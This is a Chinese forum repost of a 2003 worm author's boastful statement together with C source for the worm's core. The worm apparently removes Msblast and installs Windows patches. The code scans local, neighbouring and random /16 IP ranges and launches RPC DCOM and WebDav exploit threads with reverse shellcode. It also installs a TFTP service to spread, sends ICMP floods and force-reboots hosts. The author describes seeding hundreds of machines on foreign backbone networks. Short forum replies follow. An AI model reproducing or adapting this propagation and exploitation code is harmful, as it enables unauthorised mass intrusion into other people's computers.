8月20日，蠕虫作者突然现身，出现在某安全论坛，以下是该作者论坛上声明的转载，并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了～～　虫虫四个小时之内已经完成了任务～～～不得不写这豆腐块～～～
char *szMe = "=========== I love my wife & baby :-)~~~ Welcome Chian~~~
Notice: 2004 will remove myself:-)~~ sorry zhongli~~~=========== wins";

偶：小地方小公司小小程序员
偶从不玩安全的，临时抱佛脚，看了些资料，仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ，虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作，发网难财，违背良心，误导民众
偶就帮你丫的除光了虫虫，打光了补丁，没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄，baby 可不是情人吆，偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年？进去就是了，不就是个坐吗，切~~~ 偶是吓大的!

======================================================
0 chian 系 china 笔误~~ 敲的快了，某个指头先到:-)~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom & WebDav 使用同一反向shellcode, 用 eyas的, lion修改
(声明：谁也没给偶，偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下，就一个Call Ebx 通杀了 all 2k & xp
他丫的，还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死有 Tftpd.exe, 干吗不用，虽然偶看过 Tftp 协议，练习写过~~~

4 某年某月某日某时某刻，
溜出国门，辗转借了几台 Xeon(TM) 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具，对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多，就换个玩法 :-)~~~

5 发icmp包是为了提高搜索效率，算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫，杀虫的虫，再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了

//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动！
//罢了，冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}

if ( nLanguageID == -1)
return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}

char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过？不重启补丁无效，
找 Bill该死说去~~~
}

return TRUE;
}

// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好
:-)~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败，再尝试一次
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);

Sleep(2);
}

//添加此处代码，避免首次执行时，线程中的
InterlockedIncrement(&g_CurThreadCount) 未来得及运行，一次性建立了N个线程的
bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心，
玩过了~~~
Sleep(2);

}

Sleep(60000);
}

//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

//杀蠕虫
KillMsblast();

//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将
自身文件删除了
}

srand( GetTickCount() );

memset(pPingBuffer, `\xAA`, sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~

//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和端口

//打补丁
DoServicePackFunction();

//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;
for(;;-){ //估算了一下，普通机器２小时一循环

//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读，增加几个补充说明

1.flashsky www.xfocus.net创始人之一，启明星辰安全专家，擅长古体诗词，7月中公开rpc漏洞利用方式源代码，公开溢出分析报告，造成全球安全领域的震动，冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友，水平不咋地，不过你最好别招惹他，DDOS你一把也够受的。

3.某安全公司安全专家评论，该帖子内容基本属实，蠕虫源代码已经得到确认

B20层发表时间: 12/01 10:20

回复: hacants [hacants]

论坛用户

请问这是拿什么语言写的啊？我也要学

B21层发表时间: 12/02 14:12

回复: hd37 [hd37]

论坛用户

嚣张哦

B22层发表时间: 12/02 16:50

回复: whq1015 [whq1015]

论坛用户

你把代码公开
不是埋下了隐型炸弹吗??
/

B23层发表时间: 12/03 14:30

回复: cailiao2 [cailiao2]

论坛用户

scan.c上面那一段是什么意思，不像是宏定义吧

B24层发表时间: 05-04-03 16:47

论坛: 病毒专区